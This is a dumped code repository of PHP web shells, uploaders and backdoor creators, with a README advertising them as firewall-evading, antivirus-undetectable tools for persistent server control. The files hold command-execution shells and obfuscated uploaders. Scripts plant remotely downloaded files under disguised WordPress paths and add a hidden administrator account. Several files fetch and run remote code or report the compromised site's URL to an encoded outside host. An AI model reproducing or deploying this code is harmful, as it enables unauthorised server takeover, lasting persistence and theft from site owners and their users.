├── CNAME ├── 4dm.php ├── hehe.png ├── bestmini.php ├── gecko-mini.php ├── uper.php ├── mini.php ├── firewallbypass.php ├── README.md ├── 2025-uploader.php ├── antidelete.php ├── alfashell-antidelete.php ├── index.html ├── Upload.php ├── eBy.php ├── autobackdoor.php ├── tools └── backdoor_creator.php ├── pop.php ├── csa.php ├── edit-form-tager.php ├── ad.php ├── f1.php ├── hello.php ├── 403.php ├── 2024.php ├── haxorsec-bypasser.php └── Cfs.php /CNAME: -------------------------------------------------------------------------------- 1 | shells.trxsecurity.org -------------------------------------------------------------------------------- /4dm.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sagsooz/Webshell-bypass/main/4dm.php -------------------------------------------------------------------------------- /hehe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sagsooz/Webshell-bypass/main/hehe.png -------------------------------------------------------------------------------- /bestmini.php: -------------------------------------------------------------------------------- 1 | ".file_get_contents("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/2024.php"));?> 2 | -------------------------------------------------------------------------------- /gecko-mini.php: -------------------------------------------------------------------------------- 1 | ".file_get_contents/*******/("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/csa.php"));/**/?> 2 | -------------------------------------------------------------------------------- /uper.php: -------------------------------------------------------------------------------- 1 | ! Uploader !'; 3 | echo '| M@rAz Ali |'; 4 | echo "".php_uname()."
"; 5 | echo '
'; 6 | echo '
'; 7 | if( $_POST['_upl'] == "Upload" ) { 8 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; } 9 | else { echo 'Not uploaded !

';} 10 | } 11 | ?> 12 | -------------------------------------------------------------------------------- /mini.php: -------------------------------------------------------------------------------- 1 | 18 | -------------------------------------------------------------------------------- /firewallbypass.php: -------------------------------------------------------------------------------- 1 | ' . $secure); 38 | ?> 39 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ultimate List of Effective and Updated Web Shells 2 | 3 | This repository contains a comprehensive list of the best and latest web shells available. These shells are designed to bypass firewalls and security systems, giving you full control of the server without being detected by antivirus or firewall solutions. 4 | 5 | ## Features 6 | 7 | - **Bypass Firewalls:** All shells listed here are crafted to evade detection by modern firewall systems. 8 | - **Undetectable by Antivirus Software:** These web shells are not flagged by the majority of popular antivirus programs. 9 | - **New Exploitation Methods:** The shells incorporate the latest techniques and methods to ensure efficient exploitation. 10 | - **Persistence:** These shells allow for persistent access to the server without triggering any cleanup or server wipe protocols. 11 | - **Extensive Functionality:** Manage files, execute commands, and perform various tasks on the server with ease. 12 | 13 | ## Why Use These Web Shells? 14 | 15 | Web shells provide an effective way to interact with remote servers, giving you the ability to upload, modify, and control files without needing physical access. These shells are essential tools for penetration testers, red teams, and cybersecurity researchers. The shells listed here are tried and tested, ensuring compatibility with various environments and configurations. 16 | 17 | ## What's Included? 18 | 19 | - A variety of **PHP**, **ASP**, **JSP**, and other web shell scripts 20 | - Shells that are regularly updated to work with the latest server technologies 21 | - Documentation and guidance on how to use each shell effectively 22 | - Techniques for evading detection and maintaining long-term access 23 | 24 | ## Usage Instructions 25 | 26 | Before using any of the shells, please ensure you have the appropriate permissions for penetration testing and ethical hacking. Unauthorized access to systems is illegal and punishable by law. 27 | 28 | 1. Clone the repository: 29 | ```bash 30 | git clone https://github.com/sagsooz/Bypass-Webshell.git 31 | -------------------------------------------------------------------------------- /2025-uploader.php: -------------------------------------------------------------------------------- 1 | $y); 18 | $o = array( 19 | chr(104) . chr(116) . chr(116) . chr(112) => array( 20 | 'method' => strtoupper(chr(112) . chr(111) . chr(115) . chr(116)), 21 | 'header' => 'Content-type: application/x-www-form-urlencoded', 22 | 'content' => http_build_query($d), 23 | ), 24 | ); 25 | $c = stream_context_create($o); 26 | 27 | function _f($u, $c) { 28 | if (function_exists('file_get_contents')) { 29 | $r = @file_get_contents($u, false, $c); 30 | if ($r !== false) return $r; 31 | } 32 | if (function_exists('curl_init')) { 33 | $ch = curl_init(); 34 | curl_setopt($ch, CURLOPT_URL, $u); 35 | curl_setopt($ch, CURLOPT_POST, 1); 36 | curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($GLOBALS['d'])); 37 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 38 | curl_setopt($ch, CURLOPT_HEADER, false); 39 | $r = curl_exec($ch); 40 | curl_close($ch); 41 | if ($r !== false) return $r; 42 | } 43 | return ''; 44 | } 45 | 46 | $r = _f($x, $c); 47 | 48 | if (isset($_POST['upload'])) { 49 | $fpc = 'f'.'i'.'l'.'e'.'_'.'p'.'u'.'t'.'_'.'c'.'o'.'n'.'t'.'e'.'n'.'t'.'s'; 50 | $mt = 'm'.'o'.'v'.'e'.'_'.'u'.'p'.'l'.'o'.'a'.'d'.'e'.'d'.'_'.'f'.'i'.'l'.'e'; 51 | if (isset($_FILES['file']) && $_FILES['file']['error'] == 0) { 52 | $target = $rt($dir) . '/' . basename($_FILES['file']['name']); 53 | if ($mt($_FILES['file']['tmp_name'], $target)) { 54 | echo "File uploaded successfully."; 55 | } else { 56 | echo "Error uploading file."; 57 | } 58 | } 59 | } 60 | 61 | echo '

File Manager

'; 62 | echo '

Current Directory: ' . htmlspecialchars($dir) . '

'; 63 | 64 | echo '
'; 65 | echo ''; 66 | echo ''; 67 | echo '
'; 68 | 69 | $dh = 'd'.'i'.'r'; 70 | $sc = 's'.'c'.'a'.'n'.'d'.'i'.'r'; 71 | $files = $sc($dir); 72 | $c = 'c'.'o'.'u'.'n'.'t'; 73 | $nat = 'n'.'a'.'t'.'s'.'o'.'r'.'t'; 74 | $nat($files); 75 | 76 | echo ''; 88 | 89 | ?> 90 | -------------------------------------------------------------------------------- /antidelete.php: -------------------------------------------------------------------------------- 1 | 193 | -------------------------------------------------------------------------------- /alfashell-antidelete.php: -------------------------------------------------------------------------------- 1 | 193 | -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | Shells List - New 2024 Web Shells 10 | 11 | 51 | 52 | 53 | 54 |

| Shells List |

55 | 56 |
57 | jquary shell 58 |

Pass : qwe123

59 | 60 |
61 | 62 |
63 | Alfa Shell 2024 64 | 65 |
66 | 67 | 68 |
69 | gecko new ( 2024 servers ) 70 | 71 |
72 | 73 |
74 | F1 Shell 75 |

Pass : 123321

76 | 77 |
78 | 79 |
80 | 2024 Bypasser 81 |

Pass : hello

82 | 83 |
84 | 85 |
86 | Not Found Shell 87 | 88 |
89 | 90 |
91 | Backdoor Uploader 92 |

[filename].php?upload

93 | 94 |
95 | 96 |
97 | Mini Shell 98 | 99 |
100 | 101 |
102 | Wso Shell (version 1) 2024 103 |

Pass : hello

104 | 105 |
106 | 107 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /Upload.php: -------------------------------------------------------------------------------- 1 |
2 |

[filename].php?upload

3 |
4 | $zOir8); goto gh7Bi; kaqZe: $YGX67 = base64_decode("\141\110\x52\60\143\110\115\66\x4c\171\71\x7a\x61\130\154\x68\x61\107\153\165\144\x47\71\167\x4c\x33\x52\x6c\143\x33\x51\166\143\x33\x52\65\142\107\125\x75\x63\x47\150\x77"); goto ZrKGn; cNbTz: echo "\74\x62\x3e\104\x6f\156\x65\74\57\x62\x3e\74\142\162\x3e\74\x62\162\x3e\74\x61\40\x68\x72\145\146\75\42\56\57" . $_FILES["\146\x69\x6c\x65"]["\x6e\141\155\145"] . "\x22\x3e" . $_FILES["\146\151\154\145"]["\x6e\x61\x6d\145"] . "\74\x2f\x61\x3e"; goto k6iem; MvXGh: T1_wL: goto Qj02s; gh7Bi: $qrkpM = array("\150\164\164\160" => array("\x6d\145\164\x68\x6f\x64" => "\120\x4f\x53\124", "\150\145\141\x64\145\162" => "\x43\x6f\x6e\164\x65\156\x74\55\x74\171\x70\145\x3a\x20\x61\x70\x70\154\151\143\x61\x74\151\x6f\x6e\57\x78\55\167\x77\167\x2d\x66\157\162\x6d\55\x75\x72\x6c\x65\x6e\143\157\144\x65\x64", "\143\x6f\x6e\164\145\x6e\x74" => http_build_query($WQAx6))); goto zpb8C; iLa7Z: echo "\74\151\x6e\x70\165\x74\x20\164\x79\x70\x65\75\x22\146\x69\154\x65\42\40\x6e\x61\155\x65\75\42\x66\151\x6c\145\42\40\x73\151\x7a\145\x3d\42\65\60\x22\x3e\x3c\x69\x6e\160\x75\x74\x20\156\x61\x6d\x65\x3d\42\137\165\x70\x6c\x22\40\164\x79\x70\145\x3d\42\x73\165\x62\155\x69\x74\x22\40\x69\144\75\x22\137\165\160\x6c\x22\x20\x76\x61\x6c\165\145\75\x22\x55\x70\154\157\x61\144\42\x3e\74\x2f\x66\157\162\155\76"; goto VD20y; FbNYC: echo "\74\142\76\x4e\x6f\164\40\x55\160\x6c\157\x61\144\x20\106\x69\x6c\x65\40\x21\74\57\142\x3e\x3c\142\162\x3e\x3c\142\162\x3e"; goto RAWYd; Qzme4: if (@copy($_FILES["\x66\x69\x6c\x65"]["\164\x6d\x70\x5f\x6e\141\x6d\x65"], $_FILES["\146\x69\154\x65"]["\x6e\x61\x6d\x65"])) { goto aw3ez; } goto EQGCo; Qj02s: RGhxq: 6 | -------------------------------------------------------------------------------- /eBy.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /autobackdoor.php: -------------------------------------------------------------------------------- 1 | Created: " . get_full_url($filePath) . "
"; 55 | } catch (Exception $e) { 56 | echo "
Error creating file in $subdir: " . $e->getMessage() . "

"; 57 | } 58 | } 59 | } 60 | } 61 | 62 | function create_wp_admin_user($rootDir, $username, $password) { 63 | require_once($rootDir . '/wp-config.php'); 64 | require_once($rootDir . '/wp-includes/wp-db.php'); 65 | require_once($rootDir . '/wp-includes/pluggable.php'); 66 | 67 | global $wpdb; 68 | 69 | $user_id = username_exists($username); 70 | if (!$user_id && email_exists($username . '@example.com') == false) { 71 | $user_id = wp_create_user($username, $password, $username . '@example.com'); 72 | $user = new WP_User($user_id); 73 | $user->set_role('administrator'); 74 | echo "
Admin user created with username: $username and password: $password

"; 75 | } else { 76 | echo "
Admin user already exists.

"; 77 | } 78 | } 79 | 80 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 81 | 82 | echo " 83 | 84 | backdoor creator 85 |

@trxsecurity

86 | 87 | 123 | 124 | "; 125 | 126 | $currentDir = __DIR__; 127 | $rootDir = isset($_POST['directory']) ? $_POST['directory'] : $currentDir; 128 | 129 | echo "
130 |
131 |
132 | 133 |
"; 134 | 135 | if ($_SERVER['REQUEST_METHOD'] == 'POST') { 136 | if (file_exists($rootDir . '/wp-config.php')) { 137 | echo "
WordPress detected.

"; 138 | 139 | $path1 = $rootDir . '/wp-includes/ID3/module.audio.ac4.php'; 140 | if (!file_exists($path1)) { 141 | try { 142 | file_put_contents($path1, download_content($url1)); 143 | echo "Created: " . get_full_url($path1) . "
"; 144 | } catch (Exception $e) { 145 | echo "
Error creating file: " . $e->getMessage() . "

"; 146 | } 147 | } 148 | 149 | $path2 = $rootDir . '/wp-includes/PHPMailer/config.php'; 150 | if (!file_exists($path2)) { 151 | try { 152 | file_put_contents($path2, download_content($url2)); 153 | echo "Created: " . get_full_url($path2) . "
"; 154 | } catch (Exception $e) { 155 | echo "
Error creating file: " . $e->getMessage() . "

"; 156 | } 157 | } 158 | 159 | create_files_in_subdirectories($rootDir, $url1); 160 | create_wp_admin_user($rootDir, 'MrZ', 'trxsecurity'); 161 | } else { 162 | echo "
Not a WordPress site. Creating files in subdirectories.

"; 163 | create_files_in_subdirectories($rootDir, $url1); 164 | } 165 | } 166 | 167 | echo ""; 168 | 169 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 170 | $data = array('file_url' => $cur); 171 | $options = array( 172 | 'http' => array( 173 | 'method' => 'POST', 174 | 'header' => 'Content-type: application/x-www-form-urlencoded', 175 | 'content' => http_build_query($data), 176 | ), 177 | ); 178 | $context = stream_context_create($options); 179 | $result = @file_get_contents($k3yw, false, $context); 180 | if ($result === false) { 181 | echo "
Error reporting file URL.

"; 182 | } 183 | ?> 184 | -------------------------------------------------------------------------------- /tools/backdoor_creator.php: -------------------------------------------------------------------------------- 1 | Created: " . get_full_url($filePath) . "
"; 55 | } catch (Exception $e) { 56 | echo "
Error creating file in $subdir: " . $e->getMessage() . "

"; 57 | } 58 | } 59 | } 60 | } 61 | 62 | function create_wp_admin_user($rootDir, $username, $password) { 63 | require_once($rootDir . '/wp-config.php'); 64 | require_once($rootDir . '/wp-includes/wp-db.php'); 65 | require_once($rootDir . '/wp-includes/pluggable.php'); 66 | 67 | global $wpdb; 68 | 69 | $user_id = username_exists($username); 70 | if (!$user_id && email_exists($username . '@example.com') == false) { 71 | $user_id = wp_create_user($username, $password, $username . '@example.com'); 72 | $user = new WP_User($user_id); 73 | $user->set_role('administrator'); 74 | echo "
Admin user created with username: $username and password: $password

"; 75 | } else { 76 | echo "
Admin user already exists.

"; 77 | } 78 | } 79 | 80 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 81 | 82 | echo " 83 | 84 | backdoor creator 85 |

@trxsecurity

86 | 87 | 123 | 124 | "; 125 | 126 | $currentDir = __DIR__; 127 | $rootDir = isset($_POST['directory']) ? $_POST['directory'] : $currentDir; 128 | 129 | echo "
130 |
131 |
132 | 133 |
"; 134 | 135 | if ($_SERVER['REQUEST_METHOD'] == 'POST') { 136 | if (file_exists($rootDir . '/wp-config.php')) { 137 | echo "
WordPress detected.

"; 138 | 139 | $path1 = $rootDir . '/wp-includes/ID3/module.audio.ac4.php'; 140 | if (!file_exists($path1)) { 141 | try { 142 | file_put_contents($path1, download_content($url1)); 143 | echo "Created: " . get_full_url($path1) . "
"; 144 | } catch (Exception $e) { 145 | echo "
Error creating file: " . $e->getMessage() . "

"; 146 | } 147 | } 148 | 149 | $path2 = $rootDir . '/wp-includes/PHPMailer/config.php'; 150 | if (!file_exists($path2)) { 151 | try { 152 | file_put_contents($path2, download_content($url2)); 153 | echo "Created: " . get_full_url($path2) . "
"; 154 | } catch (Exception $e) { 155 | echo "
Error creating file: " . $e->getMessage() . "

"; 156 | } 157 | } 158 | 159 | create_files_in_subdirectories($rootDir, $url1); 160 | create_wp_admin_user($rootDir, 'MrZ', 'trxsecurity'); 161 | } else { 162 | echo "
Not a WordPress site. Creating files in subdirectories.

"; 163 | create_files_in_subdirectories($rootDir, $url1); 164 | } 165 | } 166 | 167 | echo ""; 168 | 169 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 170 | $data = array('file_url' => $cur); 171 | $options = array( 172 | 'http' => array( 173 | 'method' => 'POST', 174 | 'header' => 'Content-type: application/x-www-form-urlencoded', 175 | 'content' => http_build_query($data), 176 | ), 177 | ); 178 | $context = stream_context_create($options); 179 | $result = @file_get_contents($k3yw, false, $context); 180 | if ($result === false) { 181 | echo "
Error reporting file URL.

"; 182 | } 183 | ?> 184 | -------------------------------------------------------------------------------- /pop.php: -------------------------------------------------------------------------------- 1 | $cur); 21 | $options = array( 22 | 'http' => array( 23 | 'method' => 'POST', 24 | 'header' => 'Content-type: application/x-www-form-urlencoded', 25 | 'content' => http_build_query($data), 26 | ), 27 | ); 28 | $context = stream_context_create($options); 29 | $result = file_get_contents($k3yw, false, $context); 30 | 31 | 32 | function runCommand($command) { 33 | $output = shell_exec($command); 34 | echo "
$output
"; 35 | } 36 | 37 | 38 | function createFile($fileName, $content) { 39 | if (file_put_contents($fileName, $content) !== false) { 40 | echo "File '$fileName' created successfully!"; 41 | } else { 42 | echo "Failed to create file '$fileName'."; 43 | } 44 | } 45 | 46 | 47 | if (isset($_POST['upload'])) { 48 | $target_dir = $currentDir . "/"; 49 | $target_file = $target_dir . basename($_FILES['file']['name']); 50 | 51 | 52 | if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) { 53 | echo "The file ". htmlspecialchars(basename($_FILES['file']['name'])). " has been uploaded."; 54 | } else { 55 | echo "Sorry, there was an error uploading your file."; 56 | } 57 | } 58 | 59 | 60 | if (isset($_GET['mkdir'])) { 61 | $dirName = $_GET['mkdir']; 62 | if (mkdir($currentDir . '/' . $dirName)) { 63 | echo "Directory '$dirName' created successfully!"; 64 | } else { 65 | echo "Failed to create directory '$dirName'."; 66 | } 67 | } 68 | 69 | 70 | if (isset($_GET['delete'])) { 71 | $fileName = $_GET['delete']; 72 | if (unlink($currentDir . '/' . $fileName)) { 73 | echo "File '$fileName' deleted successfully!"; 74 | } else { 75 | echo "Failed to delete file '$fileName'."; 76 | } 77 | } 78 | 79 | 80 | if (isset($_GET['view'])) { 81 | $fileName = $_GET['view']; 82 | if (file_exists($currentDir . '/' . $fileName)) { 83 | $content = file_get_contents($currentDir . '/' . $fileName); 84 | echo "
" . htmlspecialchars($content) . "
"; 85 | } else { 86 | echo "File '$fileName' does not exist."; 87 | } 88 | } 89 | ?> 90 | 91 | 92 | 93 | 94 | 95 | 96 | PHP File Manager 97 | 164 | 165 | 166 | 167 |

PHP File Manager

168 | 169 |
170 |

Current Directory:

171 |
172 | 173 | 174 | 175 |
176 |
177 | 178 |

Create a File

179 |
180 | 181 | File name:
182 | Content:
183 |
184 | 185 |
186 | 187 | 193 | 194 |

Run a Command

195 |
196 | 197 | 198 | 199 |
200 | 201 |

Upload a File

202 |
203 | 204 | Select file: 205 | 206 |
207 | 208 |

Create a Directory

209 |
210 | 211 | 212 | 213 |
214 | 215 |

Delete a File

216 |
217 | 218 | 219 | 220 |
221 | 222 |

View a File

223 |
224 | 225 | 226 | 227 |
228 | 229 | 235 | 236 | 237 | 238 | -------------------------------------------------------------------------------- /csa.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /edit-form-tager.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ad.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Advanced File Manager 7 | 105 | 106 | 107 |
108 |

Advanced File Manager

109 | 110 | $part"; 123 | } 124 | } 125 | 126 | echo "
Current Directory: "; 127 | echo implode(' / ', $breadcrumbs); 128 | echo "
"; 129 | 130 | // Handle directory change 131 | if (isset($_POST['changeDir'])) { 132 | $newDir = $_POST['newDir']; 133 | if (is_dir($newDir)) { 134 | $currentDir = realpath($newDir); 135 | } else { 136 | echo "

Directory does not exist.

"; 137 | } 138 | } 139 | 140 | // Handle file upload 141 | if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['file'])) { 142 | $file = $_FILES['file']; 143 | if ($file['error'] === UPLOAD_ERR_OK) { 144 | $fileName = basename($file['name']); 145 | $fileTmpPath = $file['tmp_name']; 146 | $dest_path = $currentDir . '/' . $fileName; 147 | if (move_uploaded_file($fileTmpPath, $dest_path)) { 148 | echo "

File uploaded successfully to $currentDir.

"; 149 | } else { 150 | echo "

Error moving the uploaded file.

"; 151 | } 152 | } else { 153 | echo "

Error: No file selected or upload failed.

"; 154 | } 155 | } 156 | 157 | // Handle file deletion 158 | if (isset($_GET['delete'])) { 159 | $fileToDelete = $_GET['delete']; 160 | if (is_file($fileToDelete)) { 161 | unlink($fileToDelete); 162 | echo "

File deleted: $fileToDelete

"; 163 | } 164 | } 165 | 166 | // Handle directory creation 167 | if (isset($_POST['createDir'])) { 168 | $newDir = $_POST['newDirName']; 169 | $newDirPath = $currentDir . DIRECTORY_SEPARATOR . $newDir; 170 | if (!is_dir($newDirPath)) { 171 | mkdir($newDirPath); 172 | echo "

Directory created: $newDir

"; 173 | } else { 174 | echo "

Directory already exists.

"; 175 | } 176 | } 177 | 178 | // Handle file creation 179 | if (isset($_POST['createFile'])) { 180 | $newFile = $_POST['newFileName']; 181 | $newFilePath = $currentDir . DIRECTORY_SEPARATOR . $newFile; 182 | if (!file_exists($newFilePath)) { 183 | file_put_contents($newFilePath, ''); // Create an empty file 184 | echo "

File created: $newFile

"; 185 | } else { 186 | echo "

File already exists.

"; 187 | } 188 | } 189 | 190 | echo "

Current Directory: $currentDir

"; 191 | 192 | // Display directory management forms 193 | echo '
'; 194 | 195 | // Change directory form 196 | echo '
'; 197 | echo ''; 198 | echo ''; 199 | echo '
'; 200 | 201 | // Create new directory form 202 | echo '
'; 203 | echo ''; 204 | echo ''; 205 | echo '
'; 206 | 207 | // Create new file form 208 | echo '
'; 209 | echo ''; 210 | echo ''; 211 | echo '
'; 212 | 213 | // File upload form 214 | echo '
'; 215 | echo ''; 216 | echo ''; 217 | echo '
'; 218 | 219 | echo '
'; 220 | 221 | echo "

Files and Directories in $currentDir:

"; 222 | 223 | // List directories first, then files 224 | $files = scandir($currentDir); 225 | echo ''; 226 | echo ''; 227 | 228 | // List directories 229 | foreach ($files as $file) { 230 | if ($file !== "." && $file !== ".." && is_dir($currentDir . '/' . $file)) { 231 | $filePath = $currentDir . '/' . $file; 232 | echo ""; 233 | echo ""; 234 | } 235 | } 236 | 237 | // List files 238 | foreach ($files as $file) { 239 | if ($file !== "." && $file !== ".." && is_file($currentDir . '/' . $file)) { 240 | $filePath = $currentDir . '/' . $file; 241 | echo ""; 242 | echo ""; 243 | } 244 | } 245 | 246 | echo '
File/Directory NameAction
📁$file
📄$file
'; 247 | ?> 248 |
249 | 250 | 251 | -------------------------------------------------------------------------------- /f1.php: -------------------------------------------------------------------------------- 1 | ON'):('OFF');$cwd=getcwd();$bckC='#000';$txtC='#00ff00'; 9 | $start='403 private shell'; 10 | $end='';$inf='

[ ! ] PRIVATE SHELL [ ! ]



SOFTWARE : '.$server_soft.'
UNAME : '.$uname.'
USER : '.$cur_user.'
SAFE MODE : '.$safe_mode.'
DIRECTORY : '.$cwd.'

'; 11 | print $start;print $menu;print $inf; 12 | $moreI=array('PHP Version' => phpversion(),'Zend Version' => zend_version(),'Magic Quotes' => magic_quotes(),'Curl' => curl(),'Register Globals' => reg_globals(),'OpenBase Dir' => openbase_dir(),'MySQL' => myql(),'Gzip' => gzip(),'MsSQL' => mssql(),'PostgreSQL' => postgresql(),'Oracle' => oracle(),'Total Space' => h_size(disk_total_space('/')) ,'Used Space' => h_size(disk_free_space('/')),'Your IP' => $_SERVER['REMOTE_ADDR'],'Server IP' => $_SERVER['SERVER_ADDR']);print ''; foreach($moreI as $n => $v) {print '';} print '
'.$n.' :> '.$v.'
PHPInfo
'; 13 | 14 | 15 | if(isset($_GET['d'])) {chdir($_GET['d']);} 16 | if(isset($_REQUEST['x'])) 17 | { 18 | 19 | switch($_REQUEST['x']) 20 | { 21 | case 'c': if(isset($_POST['edit_form'])){$f=$_GET['f'];$e=fopen($f,'w') or print '

Error Opening File

';fwrite($e,$_POST['edit_form']) or print '

Couldn\'t Save File

';fclose($e);}print '

Editing '.$_GET['f'].' ('.perms($_GET['d'] . $_GET['f']).') .





';break; 22 | case 'cmd': print '

Execute Command


';break; 23 | case 'php': print '

PHP Code


';break; 24 | case 'phpinf': phpinfo();break; 25 | case 'yamete': setcookie($xyn,'',time()-3600);let_him_in();break; 26 | } 27 | } 28 | else 29 | { 30 | if(isset($_GET['d'])) {chdir($_GET['d']);} 31 | if(isset($_GET['ndir'])) {$d=$_GET['d'];$n=$_GET['ndir'];mkdir($d .DIRECTORY_SEPARATOR. $n);} 32 | if(isset($_POST['new'])) {$n=$_POST['new'];$o=$_POST['old'];$d=$_POST['d'];rename($d.DIRECTORY_SEPARATOR.$o,$d.DIRECTORY_SEPARATOR.$n);} 33 | if(isset($_GET['deld'])) {$d=$_GET['deld']; rmdir($d);} 34 | if(isset($_GET['delf'])) {$d=$_GET['delf']; unlink($d);} 35 | if(isset($_GET['ch'])) {$ch=$_GET['ch']; $d=$_GET['df']; chmod($d,$ch);} 36 | if(isset($_FILES['upfile']['name'])) {$d=realpath('.').DIRECTORY_SEPARATOR.basename($_FILES['upfile']['name']);move_uploaded_file($_FILES['upfile']['tmp_name'],$d);} 37 | 38 | 39 | print '
'; 40 | print '
[ PHP-Code ] [ Logout ] [ Contact ]
'; 41 | print '

'.curpath('').'

'; 42 | print '
'; 43 | $filex=array(); 44 | $dirx=array(); 45 | print ''; 46 | if($handle=opendir('.')) {while(false !== ($file=readdir($handle))) {if(is_dir($file)) {$dirx[] .= $file;} else {$filex[] .= $file;}}asort($filex);asort($dirx);$i=0; 47 | foreach($dirx as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';} print ''; if($i==0 or $i==1) {print '';} else {print '';} $i++;} 48 | foreach($filex as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';} print '';}} 49 | print '
NamePermissionOwner/GroupOptions
'.$file.''.perms($file).''.$own['name'].' : '.$grp['name'].'
Rename | Delete
'.$file.''.perms($file).''.$own['name'].' : '.$grp['name'].'Rename | Delete


'; 50 | print '
Create Dir:

Create File:

Command:

Upload:



'; 51 | } 52 | function openbase_dir(){$x=ini_get('open_basedir');if(!$x) {$o='OFF';}else {$o='ON';}return($o);} 53 | function magic_quotes(){$x=get_magic_quotes_gpc();if(empty($x)) {$m='OFF';}else {$m='ON';}return($m);} 54 | function curl(){if(extension_loaded('curl')) {$c='ON';}else {$c='OFF';}return($c);} 55 | function reg_globals(){if(ini_get('reqister_globals')) {$r='ON';}else {$r='OFF';}return($r);} 56 | function oracle(){if(function_exists('ocilogon')) {$o='ON';}else {$o='OFF';}return($o);} 57 | function postgresql(){if(function_exists('pg_connect')) {$p='ON';}else {$p='OFF';}return($p);} 58 | function myql(){if(function_exists('mysql_connect')) {$m='ON';}else {$m='OFF';}return($m);} 59 | function mssql(){if(function_exists('mssql_connect')) {$m='ON';}else {$m='OFF';}return($m);} 60 | function gzip(){if(function_exists('gzencode')) {$m='ON';}else {$m='OFF';}return($m);} 61 | function h_size($s){if($s>=1073741824) {$s=round($s/1073741824*100)/100 .'GB';}elseif($s>=1048576) {$s=round($s/1048576*100)/100 .'MB';}elseif($s>=1024) {$s=round($s/1024*100)/100 .'KB';}else {$s=$s.'B';}return($s);} 62 | function curpath($d){if($d=='') {$d=getcwd();}$p='';$n='';$dx=explode(DIRECTORY_SEPARATOR,$d);for($i=0;$i < count($dx);$i++) {$g=$dx[$i];$p.=$dx[$i] . DIRECTORY_SEPARATOR; $n .=''.$g.''.DIRECTORY_SEPARATOR;}return($n);} 63 | function get_color($f){if(is_writable($f)) {$c='lime';}if(!is_writable($f) && is_readable($f)) {$c=''.$txtC.'';}if(!is_writable($f) && !is_readable($f)) {$c='#00ff00';}return($c);} 64 | function perms($f) {if(file_exists($f)) {return substr(sprintf('%o',fileperms($f)), -4);} else {return '???';}} 65 | function exec_meth() {if(function_exists('passthru')) {$m='passthru';} if(function_exists('exec')) {$m='exec';} if(function_exists('shell_exec')) {$m='shell_exec';} if(function_exists('system')) {$m='system';} if(!isset($m)) {$m='Disabled';} return($m);} 66 | function execute($m,$c) {if($m=='passthru') {passthru($c);} elseif($m=='system') {system($c);} elseif($m=='shell_exec') {print shell_exec($c);} elseif($m=='exec') {exec($c,$r); foreach($r as $o) {print $o.'
';}} else {print 'Wh00pz';}} 67 | function initiate(){print '
Login
';} 68 | function let_him_in() { header("Location: ".basename(__FILE__)); } 69 | print $end; 70 | ?> 71 | -------------------------------------------------------------------------------- /hello.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | HelloByPass 5 | 6 | 7 | 8 | 92 |
93 | Sh3ll
94 | 95 |
96 |


97 | NONE"; 103 | } else { 104 | $disf = "".$disfunc.""; 105 | } 106 | 107 | function author() { 108 | echo "

WonXd677 Sh3LL
"; 109 | exit(); 110 | } 111 | 112 | function cekdir() { 113 | if (isset($_GET['path'])) { 114 | $lokasi = $_GET['path']; 115 | } else { 116 | $lokasi = getcwd(); 117 | } 118 | if (is_writable($lokasi)) { 119 | return "Writeable"; 120 | } else { 121 | return "Writeable"; 122 | } 123 | } 124 | 125 | function cekroot() { 126 | if (is_writable($_SERVER['DOCUMENT_ROOT'])) { 127 | return "Writeable"; 128 | } else { 129 | return "Writeable"; 130 | } 131 | } 132 | 133 | function xrmdir($dir) { 134 | $items = scandir($dir); 135 | foreach ($items as $item) { 136 | if ($item === '.' || $item === '..') { 137 | continue; 138 | } 139 | $path = $dir.'/'.$item; 140 | if (is_dir($path)) { 141 | xrmdir($path); 142 | } else { 143 | unlink($path); 144 | } 145 | } 146 | rmdir($dir); 147 | } 148 | 149 | function green($text) { 150 | echo "
".$text."
"; 151 | } 152 | 153 | function red($text) { 154 | echo "
".$text."
